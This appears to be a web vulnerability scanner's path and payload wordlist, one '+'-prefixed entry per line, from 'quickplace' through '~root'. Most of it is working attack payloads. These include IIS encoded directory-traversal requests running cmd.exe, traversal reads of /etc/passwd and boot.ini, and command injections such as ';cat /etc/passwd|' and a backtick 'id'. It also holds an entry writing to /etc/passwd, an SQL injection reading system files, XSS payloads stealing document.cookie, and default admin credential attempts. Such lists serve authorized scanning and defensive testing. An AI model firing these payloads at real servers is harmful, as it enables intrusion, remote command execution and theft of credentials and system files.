+quickplace/quickplace/main.nsf
+quickstart/qstart50.nsf
+quickstart/wwsample.nsf
+quikmail/nph-emumail.cgi?type=../%00
+quikstore.cfg
+quikstore.cgi
+rap
+rc
+readme
+readme.eml
+readme.nsf
+readme.txt
+readmec.nsf
+readmes.nsf
+redir.cgi
+redir.pl
+redirect.cgi
+redirect.pl
+reports.nsf
+rightfax/fuwww.dll
+rightfax/fuwww.dll/
+robots.txt
+room/save_item.php
+rpc/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
+rpc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
+rtm.log
+rubrique.asp?no=/.\
+sam
+sam._
+sam.bin
+sample.asp
+sample/faqw46
+sample/framew46
+sample/pagesw46
+sample/siregw46
+sample/site1w4646
+sample/site2w4646
+sample/site3w4646
+samples/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
+samples/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
+samples/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
+samples/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
+samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ 
+samples/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
+samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 
+samples/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
+samples/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
+samples/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
+samples/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
+samples/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir
+samples/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir
+samples/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir
+samples/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir
+samples/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir
+samples/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir
+samples/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir
+samples/search/queryhit.htm
+sca/menu.jsp
+schema50.nsf
+scozbook/view.php?PG=whatever
+screen.php
+script/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
+script/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
+script/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
+script/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
+script/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
+script/..%u0025%u005c../..%u0025%u005c../..%u0025%u005c../winnt/system32/cmd.exe?/c+dir
+script/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
+script/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
+script/.._../winnt/system32/cmd.exe?/c+dir
+scripts
+scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ 
+scripts/*
+scripts/*.pl
+scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" & vbCrLf & vbCrLf
+scripts/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
+scripts/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
+scripts/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
+scripts/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
+scripts/..%%35%63../..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir
+scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
+scripts/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
+scripts/..%%35c../..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir
+scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
+scripts/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
+scripts/..%25%35%63../..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir
+scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
+scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir
+scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\ 
+scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
+scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ 
+scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ver
+scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
+scripts/..%255c../..%255c../..%255cwinnt/system32/cmd.exe?/c+dir
+scripts/..%255c../winnt/system32/cmd.exe?/c+dir
+scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+dir+c:\ 
+scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+dir+c:\ 
+scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir+c:\ 
+scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\ 
+scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
+scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 
+scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\ 
+scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
+scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
+scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ 
+scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\ 
+scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ 
+scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:\ 
+scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\ 
+scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\ 
+scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
+scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\ 
+scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
+scripts/..%u0025%u005c../..%u0025%u005c../..%u0025%u005c../winnt/system32/cmd.exe?/c+dir
+scripts/..%u0025%u005c../winnt/system32/cmd.exe?/c+dir
+scripts/..%u00255c../..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir
+scripts/..%u00255c../winnt/system32/cmd.exe?/c+dir
+scripts/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
+scripts/..%u002f../..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir
+scripts/..%u002f../winnt/system32/cmd.exe?/c+dir
+scripts/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
+scripts/..%u005c../..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir
+scripts/..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
+scripts/..%u005c../winnt/system32/cmd.exe?/c+dir
+scripts/../../../../../winnt/system32/cmd.exe?/c+dir
+scripts/../../../../../winnt/system32/cmd.exe?/c+dir%20c:\
+scripts/../../cmd.exe
+scripts/../../winnt/system32/cmd.exe?/c+dir
+scripts/..\../winnt/system32/cmd.exe?/c+dir%20c:\
+scripts/..\..\..\..\../winnt/system32/cmd.exe?/c+dir
+scripts/..\..\..\..\../winnt/system32/cmd.exe?/c+dir%20c:\
+scripts/.._../winnt/system32/cmd.exe?/c+dir
+scripts/CGImail.exe
+scripts/Carello/Carello.dll
+scripts/Carello/add.exe
+scripts/Fpadmcgi.exe 
+scripts/GW5/GWWEB.EXE
+scripts/IISADMPWD 
+scripts/admin.pl
+scripts/bbs.pl%3F+.htr
+scripts/c32web.exe
+scripts/c32web.exe/ChangeAdminPassword
+scripts/cart32.exe
+scripts/cart32.exe/cart32clientlist
+scripts/cfgwiz.exe
+scripts/cgimail.exe
+scripts/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c%20dir%20C:\
+scripts/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c%20dir%20C:\
+scripts/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c%20dir%20C:\
+scripts/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c%20dir%20C:\
+scripts/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c%20dir%20C:\
+scripts/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c%20dir%20C:\
+scripts/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c%20dir%20C:\
+scripts/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c%20dir%20C:\
+scripts/cmd.exe
+scripts/cmd.exe?/c+dir%20c:\
+scripts/cmd32.exe
+scripts/cmd32.exe?/c+dir
+scripts/contents.htm
+scripts/convert.bas
+scripts/counter.exe
+scripts/cphost.dll
+scripts/cpshost.dll
+scripts/db4web_c.exe/dbdirname/c%3A%5Cboot.ini
+scripts/dbman/db.cgi?db=invalid-db
+scripts/dmailweb.exe
+scripts/dnewsweb.exe
+scripts/emurl/RECMAN.dll
+scripts/environ.pl
+scripts/fpadmcgi.exe
+scripts/fpadmin.htm
+scripts/fpcount.exe
+scripts/fpremadm.exe
+scripts/fpsrvadm.exe
+scripts/gupcgi.exe
+scripts/htimage.exe
+scripts/httpodbc.dll
+scripts/iisadmin 
+scripts/iisadmin/bdir.htr
+scripts/iisadmin/default.htm 
+scripts/iisadmin/ism.dll
+scripts/iisadmin/ism.dll?http/dir
+scripts/iisadmin/samples 
+scripts/iisadmin/tools 
+scripts/iisadmin/tools/ctss.idc
+scripts/iisadmin/tools/getdrvrs.exe
+scripts/iisadmin/tools/mkilog.exe
+scripts/issadmin/bdir.htr
+scripts/lsass.exe
+scripts/no-such-file.pl
+scripts/perl
+scripts/pfieffer.bat
+scripts/pfieffer.cmd
+scripts/postinfo.asp
+scripts/proxy/w3proxy.dll
+scripts/repost.asp
+scripts/rguest.exe
+scripts/root.exe?/c+dir+c:\ 
+scripts/root.exe?/c+dir+c:\+/OG
+scripts/samples 
+scripts/samples/ctguestb.idc
+scripts/samples/details.idc
+scripts/samples/search/author.idq
+scripts/samples/search/filesize.idq
+scripts/samples/search/filetime.idq
+scripts/samples/search/qfullhit.htw
+scripts/samples/search/qsumrhit.htw
+scripts/samples/search/query.idq
+scripts/samples/search/queryhit.idq
+scripts/samples/search/simple.idq
+scripts/samples/search/webhits.exe
+scripts/slxweb.dll
+scripts/srchadm/webhits.exe
+scripts/tools 
+scripts/tools/ctss.idc
+scripts/tools/dsnform
+scripts/tools/dsnform.exe
+scripts/tools/getdrvrs.exe
+scripts/tools/getdrvs.exe
+scripts/tools/mkilog.exe
+scripts/tools/newdsn.exe
+scripts/tools/uploadn.asp
+scripts/tools/uploadx.asp
+scripts/tradecli.dll
+scripts/tradecli.dll?template=nonexistfile?template=..\..\..\..\..\winnt\system32\cmd.exe?/c+dir
+scripts/upload.asp
+scripts/uploadn.asp
+scripts/uploadx.asp
+scripts/visadmin.exe
+scripts/wa.exe
+scripts/webbbs.exe
+scripts/wguest.exe
+scripts/wsisa.dll
+scripts/wsisa.dll/WService=anything?WSMadmin
+se/?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse
+search.asp?Search=
+search.dll?search?query=%00&logic=AND
+search.dll?search?query=/&logic=AND
+search.php?searchfor=\
+search/SQLQHit.asp
+search/htx/SQLQHit.asp
+search/htx/sqlqhit.asp
+search/inc/
+search/sqlqhit.asp
+search97.vts
+search97cgi/s97_cgi
+search?NS-query-pat=../../../../../../../../../../etc/passwd
+search?NS-query-pat=..\..\..\..\..\..\..\..\..\..\boot.ini
+secret.nsf
+secure/.htaccess
+secure/.wwwacl
+securecontrolpanel/
+securelogin/1,2345,A,00.html
+security/web_access.html
+sendphoto.php
+server-info
+server-status
+servers/link.cgi
+servlet/AdminServlet
+servlet/Counter
+servlet/DateServlet
+servlet/FingerServlet
+servlet/HelloWorldServlet
+servlet/IsItWorking
+servlet/PrintServlet
+servlet/SchedulerTransfer
+servlet/SearchServlet
+servlet/ServletManager
+servlet/SessionManager
+servlet/SessionServlet
+servlet/SimpleServlet
+servlet/SnoopServlet
+servlet/admin?category=server&method=listAll&Authorization=Digest+username%3D%22admin%22%2C+response%3D%22ae9f86d6beaa3f9ecb9a5b7e072a4138%22%2C+nonce%3D%222b089ba7985a883ab2eddcd3539a6c94%22%2C+realm%3D%22adminRealm%22%2C+uri%3D%22%2Fservlet%2Fadmin%22&service=
+servlet/allaire.jrun.ssi.SSIFilter
+servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter
+servlet/com.newatlanta.servletexec.JSP10Servlet/
+servlet/com.newatlanta.servletexec.JSP10Servlet/..%5c..%5cglobal.asa
+servlet/com.unify.servletexec.UploadServlet
+servlet/gwmonitor
+servlet/sq1cdsn
+servlet/sqlcdsn
+servlet/sunexamples.BBoardServlet
+servlet/webacc
+servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../boot.ini%00
+servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../etc/passwd%00
+servlet/webacc?User.html=noexist
+servlet/webpub
+servlets/SchedulerTransfer
+session/adminlogin
+session/admnlogin
+setpasswd.cgi
+settings/site.ini
+setup.nsf
+setupweb.nsf
+shop/database/metacart.mdb
+shop/member_html.cgi?file=;cat%20/etc/passwd|
+shop/member_html.cgi?file=|cat%20/etc/passwd|
+shop/normal_html.cgi?file=../../../../../../etc/issue%00
+shop/normal_html.cgi?file=;cat%20/etc/passwd|
+shop/normal_html.cgi?file=|cat%20/etc/passwd|
+shop/php_files/site.config.php+
+shop/search.php
+shop/show.php
+shopa_sessionlist.asp
+shopadmin.asp
+shopdbtest.asp
+shoponline/fpdb/shop.mdb
+shopping/database/metacart.mdb
+shopping/diag_dbtest.asp
+shopping300.mdb
+shopping400.mdb
+shoppingdirectory/midicart.mdb
+shoutbox.php?conf=../../../../../../../etc/passwd
+shoutbox/expanded.php?conf=../../../../../../../etc/passwd%20
+showcat.php?catid=&lt;Script&gt;JavaScript:alert('Vulnerable');&lt;/Script&gt;
+showfile.asp
+si
+signon
+simplebbs/users/users.php
+sips/sipssys/users/a/admin/user
+site/' UNION ALL SELECT FileToClob('/etc/passwd','server')::html,0 FROM sysusers WHERE username = USER --/.html
+site/' UNION ALL SELECT FileToClob('/etc/passwd','server')::html,0 FROM sysusers WHERE username=USER --/.html
+site/eg/source.asp
+site/iissamples/
+site_searcher.cgi
+siteminder
+siteminder/smadmin.html
+siteseed/
+siteserver/publishing/viewcode.asp?source=/default.asp
+smbcfg.nsf
+smconf.nsf
+smdata.dat
+smency.nsf
+smg_Smxcfg30.exe?vcc=3560121183d3
+smhelp.nsf
+smmsg.nsf
+smquar.nsf
+smsolar.nsf
+smssend.php
+smtime.nsf
+smtp.box
+smtp.nsf
+smtpibwq.nsf
+smtpobwq.nsf
+smtptbls.nsf
+smvlog.nsf
+soap/servlet/soaprouter
+soapConfig.xml
+software.nsf
+soinfo.php?\
+spelling.php3+
+splashAdmin.php
+spwd
+sqldump.sql
+sqlnet.log
+sqlqhit.asp
+squirrelmail/src/read_body.php
+src/read_body.php?mailbox=%3Cscript%3Ealert(Vulnerable)%3C%2Fscript%3E&passed_id=%3Cscript%3Ealert(Vulnerable)%3C%2Fscript%3E&startMessage=1&show_more=0
+srchadm 
+srvinst.nsf
+srvnam.htm
+srvstatus.chl+
+ssdefs/
+ssdefs/siteseed.dtd
+sshome/
+ssi/envout.bat
+ssi/envout.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\
+start.php?config=alper.inc.php
+staticpages/index.php
+statmail.nsf
+statrep.nsf
+status.php3
+stauths.nsf
+stautht.nsf
+stconf.nsf
+stconfig.nsf
+stdnaset.nsf
+stdomino.nsf
+stlog.nsf
+streg.nsf
+stronghold-info
+stronghold-status
+structure.sql
+stsrc.nsf
+style/
+styles/
+submit?setoption=q&option=allowed_ips&value=255.255.255.255
+support/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd
+support/messages
+supporter/index.php
+supporter/tupdate.php
+surf/scwebusers
+sw000.asp?|-|0|404_Object_Not_Found
+sys
+syslog.htm?%20
+system
+sysuser/docmgr/iecreate.stm?template=../
+sysuser/docmgr/ieedit.stm?url=../
+taff
+tatistic
+tatistics
+tats
+tatus
+technote/print.cgi
+test
+test.nsf
+test.php
+test.php%20
+test/info.php
+test/jsp/Language.jsp
+test/jsp/buffer1.jsp
+test/jsp/buffer2.jsp
+test/jsp/buffer3.jsp
+test/jsp/buffer4.jsp
+test/jsp/declaration/IntegerOverflow.jsp
+test/jsp/extends1.jsp
+test/jsp/extends2.jsp
+test/jsp/pageAutoFlush.jsp
+test/jsp/pageDouble.jsp
+test/jsp/pageExtends.jsp
+test/jsp/pageImport2.jsp
+test/jsp/pageInfo.jsp
+test/jsp/pageInvalid.jsp
+test/jsp/pageIsErrorPage.jsp
+test/jsp/pageIsThreadSafe.jsp
+test/jsp/pageSession.jsp
+test/phpinfo.php
+test/realPath.jsp
+texis.exe/?-dump
+texis.exe/?-version
+texis/websearch/phine
+thebox/admin.php?act=write&username=admin&password=admin&aduser=admin&adpass=admin
+theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter,/system/status/session
+theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter\
+theme1/selector?button=status,monitor,session&button_url=/system/status/status\
+theme1/selector?button=status,monitor,session\
+ticket.php?id=99999
+tiki/
+tiki/tiki-install.php
+tinymsg.php
+tmlscript
+tmp_view.php?file=/etc/passwd
+today.nsf
+tomcat-docs/index.html
+topic/entete.php
+topsitesdir/edit.php
+trace.axd
+tree
+tree.dat
+tsweb/
+ttforum/index.php
+tutos/file/file_new.php
+tutos/file/file_select.php
+tvcs/getservers.exe?action=selects1
+typo3/typo3/dev/translations.php
+typo3conf/
+typo3conf/database.sql
+typo3conf/localconf.php
+uestbook.cgi
+uifc/MultFileUploadHandler.php+
+un
+upd/
+update.cgi
+update.php
+update.php3
+update.pl
+upload.asp
+upload.cgi+
+upload.php?type=\
+uploader.php
+uploadn.asp
+uploadx.asp
+url.jsp
+urvey.cgi
+us/cgi-bin/sewse.exe?d:/internet/sites/us/sewse/jabber/comment2.jse+c:\boot.ini
+usage/
+user.dat
+user.log
+user.php?op=confirmnewuser&module=NS-NewUser&uname=%22%3E%3Cimg%20src=%22javascript:alert(document.cookie);%22%3E&email=test@test.com
+useraction.php3
+usercp.php?function=avataroptions:javascript:alert(%27Vulnerable%27)
+userinfo.php?uid=1;
+userlog.php
+userreg.cgi?cmd=insert&amp;lang=eng&amp;tnum=3&amp;fld1=test999%0acat&lt;/var/spool/mail/login&gt;&gt;/etc/passwd
+userreg.nsf
+users.nsf
+utils/sprc.asp+
+vars.inc+
+vbcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
+vbulletincalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
+vc30/
+vchat/msg.txt
+vgn/legacy/save
+vgn/license
+vgn/login
+vgn/login/1,501,,00.html?cookieName=x--\>
+vgn/style
+vider.php3
+view_source.jsp
+viewimg.php?path=../../../../../../../../../../etc/passwd&form=1&var=1
+viewpage.php?file=/etc/passwd
+vpuserinfo.nsf
+w-agora/
+wa.exe
+warez/
+wbboard/profile.php
+wbboard/reply.php
+web-console/ServerInfo.jsp%00
+web.nsf
+webMathematica/MSP?MSPStoreID=../../../../../../../../../../etc/passwd&MSPStoreType=image/gif
+webMathematica/MSP?MSPStoreID=..\..\..\..\..\..\..\..\..\..\boot.ini&MSPStoreType=image/gif
+web_app/WEB-INF/jrun-web.xml
+web_app/WEB-INF/webapp.properties
+webadmin.nsf
+webalizer/
+webamil/test.php
+webamil/test.php?mode=phpinfo
+webcalendar/forum.php?user_inc=../../../../../../../../../../etc/passwd
+webcalendar/login.php
+webcalendar/view_m.php
+webcalendar/week.php?user=\
+webcart-lite/config/import.txt
+webcart-lite/orders/import.txt
+webcart/carts/
+webcart/config/
+webcart/config/clients.txt
+webcart/orders/
+webcart/orders/import.txt
+webdist.cgi
+webgais
+webmail/blank.html
+webmail/horde/test.php
+webmail/lib/emailreader_execute_on_each_page.inc.php
+webmail/src/read_body.php
+webmaster_logs
+websendmail
+webuser.nsf
+welcome.nsf
+whatever.htr
+whateverJUNK(4).html
+wikihome/action/conflict.php
+wksinst.nsf
+ws_ftp.ini
+ww-sql
+wwboard.pl
+wwwboard.pl
+wwwboard/passwd.txt
+wwwshell.pl
+wx/s.dll?d=/boot.ini
+x_stat_admin.php
+xdk/
+xsql/demo/adhocsql/query.xsql?sql=select%20username%20from%20ALL_USERS
+xsql/demo/airport/airport.xsql?xml-stylesheet=none
+yabbse/Reminder.php
+yabbse/Sources/Packages.php
+z_user_show.php?method=showuserlink&class=<Script>javascript:alert(document.cookie)</Script>&rollid=admin&x=3da59a9da8825&
+zentrack/index.php
+~bin
+~ftp
+~nobody/etc/passwd
+~root/